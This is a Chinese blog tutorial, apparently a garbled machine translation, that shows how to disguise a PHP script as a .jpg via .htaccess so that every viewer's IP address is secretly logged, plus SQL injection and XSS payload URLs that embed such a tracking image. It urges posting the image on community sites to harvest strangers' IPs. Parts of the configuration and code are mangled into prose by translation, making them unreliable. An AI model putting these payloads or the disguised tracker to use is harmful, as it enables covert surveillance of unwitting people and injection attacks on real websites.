今天早上醒来后,看到一篇关于“应用sql注入语句获取ip详细地址”的文章。我非常喜欢它,所以我仔细地阅读了它。看完这篇文章,我有了新的想法:
根据htaccess的使用,用一张照片获取别人的ip地址。
在本示例教程中,您将学习训练如何用一张照片窃取ip详细地址。我的想法是通过改变把jpg文件解析成php文件。htaccess文件。
下面是您必须添加的代码。htaccess:
AddHandler应用程序/x-httpd-php5。使用jpeg文件交换格式存储的编码图像文件扩展名
然后将下面的代码复制到一个文本文档中,并将其命名为grabber.jpg。
<?服务器端编程语言(ProfessionalHypertextPreprocessor的缩写)
$fh=fopen('ip_list.txt','a');
fwrite($fh,$_SERVER['REMOTE_ADDR']。"
");
fclose($FH);
$im=imagecreatefromjpeg("n00b.png");
标头('Content-Type:image/JPEG');
imageJPEG($im);
imagedestroy($im);
?>
把grabber.jpg的权限管理到755,然后再找一张照片,命名为n00b.png,放在和grabber.jpg同一个文件目录下。
就是这样。一切准备就绪。当其他人访问grabber.jpg的这张照片时,他的ip地址会被记录下来。
(译者注:此项必须提交到自己的服务器空)
概念验证:
(译者注:创作者在此贴了一张ip可访问的试镜照。为了更好的保护大家的隐私,没有贴出来。读者可以自行查看创作者的博客。)
到现在,大家的照片已经可以开始工作了。
然后我想向您展示如何使用SQLi来获取详细的ip地址。其实用照片盗取ip详细地址很方便。没有理由每个人都用SQLi,但是为了更好地让读者获得很多专业知识,我最好说清楚:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'unionselect1,0x3c696d67207372633d22687474703a2f2f7c65657474696d652e65742f6964696f74735f746573745f7c61622f696d61676569702f7472796d652E6a7067223e
现在,我们来谈谈如何使用xss获取详细的ip地址:
http://leettime.net/xsslab1/chalg1.php?name=<imgsrc="https://upload.chinaz.com/2016/0411/1460368129852.jpg"alt="根据相片获得IP地址SQL引入句子SQL引入SQL引入进攻">&submit=Searchhttp://leettime.net/xsslab1/chalg1.php?name=<;img="https://upload.chinaz.com/2016/0411/1460368129852.jpg"alt="从照片中获取IP地址,将SQL引入句子,将SQL引入攻击">:&提交=搜索
好吧,就这样。
用这种方法你可以做很多有趣的事情。事实上,大多数社区都允许你发布一些照片,所以你可以使用这种方法来获取所有浏览过你的照片的人的详细ip地址。
感谢您阅读文章,黑客快乐!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)